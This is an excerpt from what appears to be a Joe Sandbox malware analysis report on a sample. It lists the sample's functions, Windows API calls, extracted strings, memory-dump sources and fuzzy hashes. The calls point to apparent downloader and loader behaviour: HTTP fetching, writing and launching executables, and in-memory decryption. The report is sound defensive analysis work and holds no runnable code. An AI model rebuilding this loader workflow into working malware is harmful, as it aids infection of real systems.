text, xrefs: 00401B5C
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
API String ID: 2146599340-3782612381
Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

Function 04B5003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B5024D

Strings

cess, xrefs: 04B5018D
kernel32.dll, xrefs: 04B5008F, 04B50095

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 396920cd1cc17b7f9a719df89174d27e3b796f5da06276b071d7e00186d60338
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: C6526A74A01229DFDB64DF58C985BACBBB1BF09304F1480D9E94DAB361DB30AA85DF14

Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264
networkcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000117F
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA

Strings

text, xrefs: 10001327

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
String ID: text
API String ID: 1154000607-999008199
Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155

Strings

.exe, xrefs: 1000206B
open, xrefs: 1000214F

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: .exe$open
API String ID: 1627157292-49952409
Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

http://, xrefs: 00401DE0

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: http://
API String ID: 0-1121587658
Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

Function 009ADC28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009B0B55
GetNativeSystemInfo.KERNEL32(?), ref: 009B0BAC

Strings

ibA?, xrefs: 009ADC2F

Memory Dump Source

Source File: 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ac000_BEd2lJRXFM.jbxd

Similarity

API ID: InfoNativeOpenSystem
String ID: ibA?
API String ID: 2808845718-1933388706
Opcode ID: dfd86615b99c21b1826da4f31588e43dd41d1b80edf5446f8c8dd9350ab44568
Instruction ID: c4dbaad9064bb93fee97a05f29d6acb7348777be050f26393993260dca33bdee
Opcode Fuzzy Hash: dfd86615b99c21b1826da4f31588e43dd41d1b80edf5446f8c8dd9350ab44568
Instruction Fuzzy Hash: 6451F0B240934EAFEF21CF60C9486DF3BA8EF55324F14492AE981D2981D7754CA4DB1A

Function 004020C0 Relevance: 4.6, APIs: 3, Instructions: 53
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
CloseHandle.KERNEL32(00000000), ref: 0040211E

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758

Function 04B50E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,04B50223,?,?), ref: 04B50E19
SetErrorMode.KERNEL32(00000000,?,?,04B50223,?,?), ref: 04B50E1E

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4912d90d3747dd0a2895d6015fe2bffc848cfeb5036af8c0e2bdc930983e63eb
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 37D0123154512877D7003A94DC09BCDBB1CDF09B62F108451FB0DD9080C770954046E5

Function 009B0ADF Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009B0B55
GetNativeSystemInfo.KERNEL32(?), ref: 009B0BAC

Memory Dump Source

Source File: 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ac000_BEd2lJRXFM.jbxd

Similarity

API ID: InfoNativeOpenSystem
String ID:
API String ID: 2808845718-0
Opcode ID: 7ddc3b12bd21b93ce605311b479e598d65b3226ff287fdf2a2ca060b70a5ac80
Instruction ID: abee4d069734721239983b7f1907eb10d7b93a96d459655f62afd527ab072236
Opcode Fuzzy Hash: 7ddc3b12bd21b93ce605311b479e598d65b3226ff287fdf2a2ca060b70a5ac80
Instruction Fuzzy Hash: ED31BD7140428E9FEF22CF60C948BDF3FB5EF45328F440566D88192892D7B60CA4EB18

Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2

Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD

Function 00AB3FA6 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00AB3FB8

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab3000_BEd2lJRXFM.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 672443e1a225c9151daa1b906170ce808bf1b8e330fe6aa4ecf701a70d57a951
Instruction ID: f04961f5d5fef38ee34219d10041fab37ad84972f1ae018507f26db51a0a72ea
Opcode Fuzzy Hash: 672443e1a225c9151daa1b906170ce808bf1b8e330fe6aa4ecf701a70d57a951
Instruction Fuzzy Hash: 06E0E57650929B5FD7028F34C4053DE7F71DF14240F3402A9D4425BAD3D636A9188758

Function 009AE0D3 Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 009AE0E3

Memory Dump Source

Source File: 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ac000_BEd2lJRXFM.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7e755cd56d6f37bce22f775eddf25391c232930a4df1a4808da82494890706ef
Instruction ID: 33708a0b20e1a6602043c4c01d669cd7dfc442bfa65da27fd0c5ec179c05363c
Opcode Fuzzy Hash: 7e755cd56d6f37bce22f775eddf25391c232930a4df1a4808da82494890706ef
Instruction Fuzzy Hash: C8D09EB500C645DFC7416F55844546EBBB4FE5B314F114D6DD6C186211D2350860DF52

Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0040E27B

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680

Function 00E0A0AD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00E0A0FE

Memory Dump Source

Source File: 00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E09000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e09000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4d7001dffa778d9436c41ac14ddbc27848ed5ccf9c1a3dc499c8e7e968e37f79
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 1D113279A00208EFDB01DF98C985E98BBF5AF08750F0580A4F9489B361D371EA90DF41

Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9

Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

Non-executed Functions

Function 04B53B27 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1645COMMON

Download Yara Rule

Strings

rB, xrefs: 04B56527
rB, xrefs: 04B550DE
rB, xrefs: 04B53DD6
]DFE, xrefs: 04B544F4
rB, xrefs: 04B54DB5
DFEK, xrefs: 04B55143
FOKD, xrefs: 04B5431F
rB, xrefs: 04B542AC

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
API String ID: 0-735762442
Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
Instruction ID: ee0bfc3dc63b0200a3346082a56d0392287961d26e93ad7e280e2eefdc377bad
Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
Instruction Fuzzy Hash: 7AE29DB0D002589BEB25EF64DC54BEEFB74EF10308F5041D8D9096B2A1DB756A88CFA5

Function 04B53727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B537A7
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B537CB
_mbstowcs.LIBCMT ref: 04B5381E
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B53835
GetLastError.KERNEL32 ref: 04B5383F
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B53867
GetLastError.KERNEL32 ref: 04B53871
CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B53881
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B53943
CryptDestroyKey.ADVAPI32(?), ref: 04B539B5

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B53783

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3642901890-63410773
Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
Instruction ID: 320dc16a0059a914a07c6e5c2557f679f34d30819f4a6e8a52c5ced45cb499f4
Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
Instruction Fuzzy Hash: 95818371A00218AFEF249F24CC45B99BBB5FF49344F1081E9E94DE72A0DB31AE858F55

Function 0099AA55 Relevance: 11.6, Strings: 8, Instructions: 1646COMMON

Download Yara Rule

Strings

d|~, xrefs: 0099ABDB
>:n?, xrefs: 0099AB5D
"?, xrefs: 0099BDF7
s|, xrefs: 0099B1C8
Gl, xrefs: 0099B553
), xrefs: 0099B6EA
J{, xrefs: 0099B8A6
gTv7, xrefs: 0099BE23

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: "?$)$>:n?$J{$d|~$gTv7$Gl$s|
API String ID: 0-139623580
Opcode ID: c26665c2939af1ad6623e0d6857ce1b001fd6f77cc8549271b340956a6d1fac6
Instruction ID: eae89bfa79864faeb8b0cfa8cdcf1165b9dcadeebb6804f007e8bcdfb994b617
Opcode Fuzzy Hash: c26665c2939af1ad6623e0d6857ce1b001fd6f77cc8549271b340956a6d1fac6
Instruction Fuzzy Hash: 92B2F6F350C2009FE7046E29EC8567AF7E9EFD4720F1A892DE6C483744EA3558458B97

Function 00989F85 Relevance: 10.4, Strings: 7, Instructions: 1669COMMON

Download Yara Rule

Strings

!<w_, xrefs: 0098B115
Je<g, xrefs: 0098AD68
y&m, xrefs: 0098A38F
;yW}, xrefs: 0098A0D5
7)c, xrefs: 0098AF5A
B{?, xrefs: 0098A8E4
s|G~, xrefs: 0098AEBA

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: !<w_$7)c$;yW}$B{?$Je<g$s|G~$y&m
API String ID: 0-820938758
Opcode ID: 5c6a0e704e9bf3b18f30ea9081ec7cbd8c61fbc57e642dded01c51c2d7b714ff
Instruction ID: de20292f9747872a0176507e15ca19b8e7454c640f06b128e83d391b30d4ec0b
Opcode Fuzzy Hash: 5c6a0e704e9bf3b18f30ea9081ec7cbd8c61fbc57e642dded01c51c2d7b714ff
Instruction Fuzzy Hash: 0DB208F3A082049FE304AE2DEC8577AB7EAEFD4720F1A853DE6C4C7744E93558058696

Function 0098BB12 Relevance: 7.8, Strings: 5, Instructions: 1582COMMON

Download Yara Rule

Strings

{f?, xrefs: 0098C699
a|wk, xrefs: 0098CC06
*,s, xrefs: 0098C582
hwcV, xrefs: 0098C842
k|f~, xrefs: 0098C0F0

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: *,s$a|wk$hwcV$k|f~${f?
API String ID: 0-849889885
Opcode ID: 47f8d17471c90be692e8e4065001fbc701dd552007fdce9c46a2afe3a2bba2e5
Instruction ID: cf586c274cb056765841e97a0bd7f7093695a02bb30dbd244b72a3d583d67613
Opcode Fuzzy Hash: 47f8d17471c90be692e8e4065001fbc701dd552007fdce9c46a2afe3a2bba2e5
Instruction Fuzzy Hash: FFB218F360C2049FE704AE2DEC8567ABBE9EF94320F1A4A3DE6C4C3744E97558018796

Function 0099907F Relevance: 6.6, Strings: 4, Instructions: 1615COMMON

Download Yara Rule

Strings

R:n, xrefs: 00999727
(J, xrefs: 0099912C
Uu;q, xrefs: 0099A081
;>~, xrefs: 009991D0

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: (J$;>~$R:n$Uu;q
API String ID: 0-2593278392
Opcode ID: 4af3e1826389ec36e9cc0bc3809d7ddcd2016949188d409fb6fa1b87654e2e99
Instruction ID: 4fb97802d50b6f765b075f6db08137b6bce29a9a2a86defcfdd8b613ffc03794
Opcode Fuzzy Hash: 4af3e1826389ec36e9cc0bc3809d7ddcd2016949188d409fb6fa1b87654e2e99
Instruction Fuzzy Hash: 40B206F360C204AFE3046E2DEC8567ABBE9EFD4720F1A853DE6C5C3744E67598058692

Function 0098F0E5 Relevance: 6.6, Strings: 4, Instructions: 1600COMMON

Download Yara Rule

Strings

r|,z, xrefs: 0098F8D5
GfG+, xrefs: 00990449
m~~, xrefs: 0098FE69
FUgG, xrefs: 0098F6BF

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: FUgG$GfG+$m~~$r|,z
API String ID: 0-2316294967
Opcode ID: a44a2975086594d9eb36d07aecd7ad181c00b9383f152d40433a91d2aaec94a9
Instruction ID: 3062cfad7147c534bd350af56785a0f197e9ce16413c62107e13510ee0834ce9
Opcode Fuzzy Hash: a44a2975086594d9eb36d07aecd7ad181c00b9383f152d40433a91d2aaec94a9
Instruction Fuzzy Hash: DEB2E7F3A086009FE3046E2DEC8567AFBE5EFD4720F1A893DE6C487744EA3558058697

Function 0099C575 Relevance: 6.6, Strings: 4, Instructions: 1567COMMON

Download Yara Rule

Strings

[(J{, xrefs: 0099D03D
R(=v, xrefs: 0099D3C8
P2 _, xrefs: 0099CEE6
.1?, xrefs: 0099D3E5

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: P2 _$R(=v$[(J{$.1?
API String ID: 0-2619372814
Opcode ID: 55a0334d2a88be2134de71d0b9598ecbde9f489bf2faea28e688270d338d7d7d
Instruction ID: ec9517d02b29f1c3bdada51a7f25bd18b3b124d626232cd0936c68a6f4acc72a
Opcode Fuzzy Hash: 55a0334d2a88be2134de71d0b9598ecbde9f489bf2faea28e688270d338d7d7d
Instruction Fuzzy Hash: 62B205F360C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC5C3744EA3558058697

Function 00990F6D Relevance: 6.2, Strings: 4, Instructions: 1237COMMON

Download Yara Rule

Strings

*/m, xrefs: 0099112B
`7`w, xrefs: 00991DBB
my]w, xrefs: 00991793
w{, xrefs: 009915A4

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

